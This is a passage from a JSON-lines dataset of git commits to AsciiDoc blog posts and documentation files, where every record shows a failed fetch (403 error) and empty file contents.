{"commit":"14ef2bf0af5c2363c573366024642effcd1e8aad","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be5c3bd3b7e029904c1c7408ca0524259faf1295","subject":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","message":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f438a22691377da3248667fd10531148fdf329","subject":"Update 2017-04-10-Biologistische-Evolutionsmarchen.adoc","message":"Update 2017-04-10-Biologistische-Evolutionsmarchen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-10-Biologistische-Evolutionsmarchen.adoc","new_file":"_posts\/2017-04-10-Biologistische-Evolutionsmarchen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ababbb73602e9762bc7c3293849d3ed4030b2415","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f84e3a0317412fdcc80431a6a727d9e8f98b85e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41d34cfbe5ab9e49ac9078babd98aad35bfa47d3","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"384e38ccfe216f17f773a79a5e35d5a5bedbc4b8","subject":"Update 2017-06-06-Make-Kali-Great-Again.adoc","message":"Update 2017-06-06-Make-Kali-Great-Again.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-06-06-Make-Kali-Great-Again.adoc","new_file":"_posts\/2017-06-06-Make-Kali-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f393a10881460d5026056bd0477ded47bb208e4","subject":"Update 2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21bd7cfcf3c0a676062aaee88df85ac176844d90","subject":"Update 2015-06-09-Cousteaus-Journey.adoc","message":"Update 2015-06-09-Cousteaus-Journey.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed45138491b74a3c667fa5a28f2d966ac6c43c99","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c82b9f5ce4b95a63974cb62d8023a1292b2994","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7f5dd518060cdfcb385eb8acf2cb6a314ea42c7","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb73686d0948e00af0df222b3a91fa0f857164f2","subject":"Add doc for tests-with-coverage quickstart","message":"Add doc for tests-with-coverage quickstart\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/tests-with-coverage-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/tests-with-coverage-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ef5b27284aea90effe89a0f2b67b6e3edc278e1","subject":"Additional resources and next steps ID guidelines","message":"Additional resources and next steps ID guidelines\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"contributing_to_docs\/doc_guidelines.adoc","new_file":"contributing_to_docs\/doc_guidelines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8fc54ac5e5109a6675fb8d2f77c6b85654a40d4","subject":"job #11571 add analysis note draft","message":"job #11571 add analysis note draft\n","repos":"cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,keithbrown\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,leviathan747\/mc,keithbrown\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc","old_file":"doc\/notes\/11571_mcmc_ciera_ant.adoc","new_file":"doc\/notes\/11571_mcmc_ciera_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b33dfc00cb066f1de947dcbcbb8ea52bf5f81fd","subject":"Document de pr\u00e9conception ; WIP","message":"Document de pr\u00e9conception ; WIP\n","repos":"autosvg\/autosvg,autosvg\/autosvg,autosvg\/autosvg","old_file":"docs\/preconception.adoc","new_file":"docs\/preconception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/autosvg\/autosvg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c20db653ab576c42e3e48b3d1c61d46196b199f0","subject":"Update 2016-07-29-Migration-t.adoc","message":"Update 2016-07-29-Migration-t.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-29-Migration-t.adoc","new_file":"_posts\/2016-07-29-Migration-t.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fa3ecf2e44bda3a62afea959cd3d4abb6cf231d","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"927c8052174464e9c032fa490eabd28af8eefb08","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2644d4f1f7e9a128d9f93ed7ed4c63bccf4ce3ef","subject":"Update 2015-06-24-Online-anomaly-detection-in-video.adoc","message":"Update 2015-06-24-Online-anomaly-detection-in-video.adoc","repos":"jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io","old_file":"_posts\/2015-06-24-Online-anomaly-detection-in-video.adoc","new_file":"_posts\/2015-06-24-Online-anomaly-detection-in-video.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jankolorenc\/jankolorenc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6650cdfea9b4d339fa5d0ba849f22eb491a860be","subject":"Update 2015-05-28-This-is-a-test.adoc","message":"Update 2015-05-28-This-is-a-test.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1efe5cf1fcc75671d9ce7e2819c193ff3076dd48","subject":"Update 2016-07-16-Title.adoc","message":"Update 2016-07-16-Title.adoc","repos":"rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io","old_file":"_posts\/2016-07-16-Title.adoc","new_file":"_posts\/2016-07-16-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rubyinhell\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2932b8cd7b1a3e0a35207ca42415cc8519ed9a58","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84108e4ea66ac9888966b7c64e9f5d498a57d56f","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27dc7b0462b41af0b2cca74fb648f4718290d033","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847089f959efbe142e2ae8f51915b3b43e018224","subject":"drop a [horizontal] definition table","message":"drop a [horizontal] definition table\n\nThe two columns of the table run together, making it hard to read.\n","repos":"mohamed\/ninja,bradking\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,ndsol\/subninja,atetubou\/ninja,Qix-\/ninja,martine\/ninja,sgraham\/ninja,automeka\/ninja,vvvrrooomm\/ninja,tfarina\/ninja,sxlin\/dist_ninja,nafest\/ninja,sgraham\/ninja,atetubou\/ninja,iwadon\/ninja,nafest\/ninja,mydongistiny\/ninja,nicolasdespres\/ninja,sxlin\/dist_ninja,moroten\/ninja,martine\/ninja,atetubou\/ninja,mohamed\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,nafest\/ninja,maruel\/ninja,Maratyszcza\/ninja-pypi,nafest\/ninja,moroten\/ninja,bradking\/ninja,nico\/ninja,tfarina\/ninja,ndsol\/subninja,lizh06\/ninja,juntalis\/ninja,fuchsia-mirror\/third_party-ninja,vvvrrooomm\/ninja,moroten\/ninja,mohamed\/ninja,ninja-build\/ninja,nico\/ninja,mgaunard\/ninja,bradking\/ninja,lizh06\/ninja,automeka\/ninja,maruel\/ninja,nicolasdespres\/ninja,tfarina\/ninja,ninja-build\/ninja,Qix-\/ninja,vvvrrooomm\/ninja,ndsol\/subninja,sxlin\/dist_ninja,ninja-build\/ninja,martine\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,lizh06\/ninja,vvvrrooomm\/ninja,fuchsia-mirror\/third_party-ninja,juntalis\/ninja,sxlin\/dist_ninja,juntalis\/ninja,sxlin\/dist_ninja,automeka\/ninja,atetubou\/ninja,tfarina\/ninja,Maratyszcza\/ninja-pypi,AoD314\/ninja,ninja-build\/ninja,AoD314\/ninja,bradking\/ninja,lizh06\/ninja,nicolasdespres\/ninja,maruel\/ninja,Maratyszcza\/ninja-pypi,mydongistiny\/ninja,mohamed\/ninja,nico\/ninja,AoD314\/ninja,mgaunard\/ninja,AoD314\/ninja,martine\/ninja,moroten\/ninja,juntalis\/ninja,Qix-\/ninja,iwadon\/ninja,Maratyszcza\/ninja-pypi,iwadon\/ninja,ndsol\/subninja,iwadon\/ninja,sxlin\/dist_ninja,mgaunard\/ninja,nicolasdespres\/ninja,sgraham\/ninja,maruel\/ninja,mgaunard\/ninja,sgraham\/ninja,Qix-\/ninja,automeka\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3474fbc0b1487bc3b6a55c50f435523d9f17e5dd","subject":"Update 20161110-1232.adoc","message":"Update 20161110-1232.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232.adoc","new_file":"_posts\/20161110-1232.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adee3f6335bb29bb686918cdb4981ee4fe55e3e6","subject":"Update 2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","message":"Update 2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","new_file":"_posts\/2015-04-13-Pourquoi-je-suis-passe-de-Wordpress-a-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8afcce4ab58baa5fc856b21dbb9f62a56ff650e2","subject":"Create BindingToEngine.adoc","message":"Create BindingToEngine.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/BindingToEngine.adoc","new_file":"wiki\/tutorials\/BindingToEngine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29ff320e07e4122f25da75268f46aab2c1534082","subject":"`emerald_revealAccount` isn't good name to unhide hidden account","message":"`emerald_revealAccount` isn't good name to unhide hidden account\n\nChange to `emerald_unhideAccount`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec1f67579a6b3f9ac2e8647daf5e7a8baeb13dd0","subject":"Update 2015-07-02-HubPress-Themes.adoc","message":"Update 2015-07-02-HubPress-Themes.adoc","repos":"tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io,tedbergeron\/hubpress.io","old_file":"_posts\/2015-07-02-HubPress-Themes.adoc","new_file":"_posts\/2015-07-02-HubPress-Themes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb1b1d5d397c2cf1e23ef0ddf5f293a8b2b6c6c7","subject":"Add dokku\/README.adoc","message":"Add dokku\/README.adoc\n","repos":"10sr\/server-provisions,10sr\/machine-setups,10sr\/machine-setups,10sr\/machine-setups,10sr\/server-provisions,10sr\/machine-setups","old_file":"conoha\/roles\/dokku\/README.adoc","new_file":"conoha\/roles\/dokku\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/10sr\/machine-setups.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"da62d28ccfb824a99cf4029cb8401d37c61e8877","subject":"added some notes about presentation tools (OBS, Idea presentation assistant and Mouse Highlight)","message":"added some notes about presentation tools (OBS, Idea presentation assistant and Mouse Highlight)\n","repos":"virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin","old_file":"notes\/presentation-tools.adoc","new_file":"notes\/presentation-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/virgo47\/litterbin.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f982776ae178a1baaba8e343d73b74cdc0eea965","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"034c0ba7a70a5046c85da27742c569a6e0d7e35a","subject":"Update 2015-10-09-Repeatable-annotations.adoc","message":"Update 2015-10-09-Repeatable-annotations.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_file":"_posts\/2015-10-09-Repeatable-annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73e4b723b35762035958fd0789f5b2153bcfce55","subject":"CAMEL-11158 - Added docs","message":"CAMEL-11158 - Added docs\n","repos":"CodeSmell\/camel,gnodet\/camel,christophd\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,zregvart\/camel,onders86\/camel,dmvolod\/camel,kevinearls\/camel,tadayosi\/camel,cunningt\/camel,ullgren\/camel,dmvolod\/camel,tadayosi\/camel,DariusX\/camel,anoordover\/camel,DariusX\/camel,apache\/camel,pax95\/camel,onders86\/camel,anoordover\/camel,pax95\/camel,objectiser\/camel,gnodet\/camel,anoordover\/camel,objectiser\/camel,zregvart\/camel,jamesnetherton\/camel,kevinearls\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,punkhorn\/camel-upstream,kevinearls\/camel,zregvart\/camel,apache\/camel,pmoerenhout\/camel,onders86\/camel,ullgren\/camel,dmvolod\/camel,cunningt\/camel,kevinearls\/camel,nicolaferraro\/camel,cunningt\/camel,anoordover\/camel,Fabryprog\/camel,alvinkwekel\/camel,gnodet\/camel,jamesnetherton\/camel,pax95\/camel,sverkera\/camel,nikhilvibhav\/camel,kevinearls\/camel,dmvolod\/camel,pax95\/camel,Fabryprog\/camel,adessaigne\/camel,sverkera\/camel,alvinkwekel\/camel,CodeSmell\/camel,davidkarlsen\/camel,dmvolod\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,onders86\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,mcollovati\/camel,objectiser\/camel,dmvolod\/camel,tdiesler\/camel,kevinearls\/camel,CodeSmell\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,nicolaferraro\/camel,ullgren\/camel,tdiesler\/camel,apache\/camel,sverkera\/camel,jamesnetherton\/camel,alvinkwekel\/camel,tdiesler\/camel,punkhorn\/camel-upstream,ullgren\/camel,pmoerenhout\/camel,anoordover\/camel,adessaigne\/camel,apache\/camel,onders86\/camel,cunningt\/camel,CodeSmell\/camel,jamesnetherton\/camel,jamesnetherton\/camel,onders86\/camel,davidkarlsen\/camel,tadayosi\/camel,mcollovati\/camel,christophd\/camel,nicolaferraro\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,Fabryprog\/camel,DariusX\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,sverkera\/camel,adessaigne\/camel,Fabryprog\/camel,zregvart\/camel,gnodet\/camel,objectiser\/camel,mcollovati\/camel,sverkera\/camel,adessaigne\/camel,davidkarlsen\/camel","old_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-job-component.adoc","new_file":"components\/camel-kubernetes\/src\/main\/docs\/kubernetes-job-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a752c94cd8ca39994f9d0026dd289c27a883c7e2","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dd02d9349feb84c6c45e71ac1f7ea697db92bf4","subject":"Update 2016-10-26-Gabe-engages-in-shoddy-academics.adoc","message":"Update 2016-10-26-Gabe-engages-in-shoddy-academics.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-10-26-Gabe-engages-in-shoddy-academics.adoc","new_file":"_posts\/2016-10-26-Gabe-engages-in-shoddy-academics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b3de893e3260955f6420198c4ee7ec0aad02579","subject":"Issue #519: Create a new sample section in the docs with links to examples","message":"Issue #519: Create a new sample section in the docs with links to examples\n","repos":"codeconsole\/grails-spring-security-core,grails-plugins\/grails-spring-security-core,grails-plugins\/grails-spring-security-core,codeconsole\/grails-spring-security-core","old_file":"plugin\/src\/docs\/examples.adoc","new_file":"plugin\/src\/docs\/examples.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails-plugins\/grails-spring-security-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0372dfa002918119554afa9b94e6b42d1b6af943","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 